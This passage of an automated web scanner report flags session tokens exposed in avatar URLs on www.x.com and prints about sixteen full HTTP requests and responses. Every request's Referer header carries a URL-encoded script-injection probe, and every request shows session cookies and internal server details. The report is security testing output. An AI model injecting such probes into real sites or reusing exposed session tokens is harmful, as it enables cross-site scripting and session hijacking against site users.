Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Saveby/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Saveby/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7564 t=1313157137058073
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.13. https://www.x.com/people/TrainingPal/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/TrainingPal/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/TrainingPal/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9158 t=1313157142670558
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.14. https://www.x.com/people/WebBusinessDeveloper/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/WebBusinessDeveloper/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/WebBusinessDeveloper/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=11384 t=1313157143975147
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.15. https://www.x.com/people/advance-software/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/advance-software/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/advance-software/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1288 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 01 Apr 2010 11:40:04 GMT
Etag: "1288"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=14112 t=1313158266056527
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Length: 5463

...[SNIP]...

3.16. https://www.x.com/people/alfrednutile/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/alfrednutile/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/alfrednutile/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7218 t=1313157137930962
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.17. https://www.x.com/people/appcode/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/appcode/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/appcode/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8301 t=1313157137177952
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.18. https://www.x.com/people/cariad/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/cariad/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/cariad/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1586 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 20 Dec 2010 13:19:20 GMT
Etag: "1586"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10493 t=1313157143020874
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Length: 5665

...[SNIP]...

3.19. https://www.x.com/people/christiancrest/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/christiancrest/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/christiancrest/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=17931 t=1313157136902220
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.20. https://www.x.com/people/ezimerchant/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/ezimerchant/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/ezimerchant/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1002 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:04 GMT
Server: Apache-Coyote/1.1
Last-Modified: Wed, 28 Oct 2009 04:35:03 GMT
Etag: "1002"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8013 t=1313158264449114
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Length: 2278

...[SNIP]...

3.21. https://www.x.com/people/inhouse/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/inhouse/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/inhouse/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7776 t=1313157137338389
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.22. https://www.x.com/people/jameshill/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/jameshill/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/jameshill/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9191 t=1313157143974814
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.23. https://www.x.com/people/judemichael2001/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/judemichael2001/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/judemichael2001/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8739 t=1313157143045447
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.24. https://www.x.com/people/lilbugclothing/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/lilbugclothing/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/lilbugclothing/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=11198 t=1313157143075751
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.25. https://www.x.com/people/lovelycar8888/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/lovelycar8888/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/lovelycar8888/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8650 t=1313157143024166
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.26. https://www.x.com/people/lurobertson/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/lurobertson/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/lurobertson/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7867 t=1313157143023151
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.27. https://www.x.com/people/mbtmobile/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/mbtmobile/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/mbtmobile/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10785 t=1313157144017520
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.28. https://www.x.com/people/michaelcaplan/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/michaelcaplan/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/michaelcaplan/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
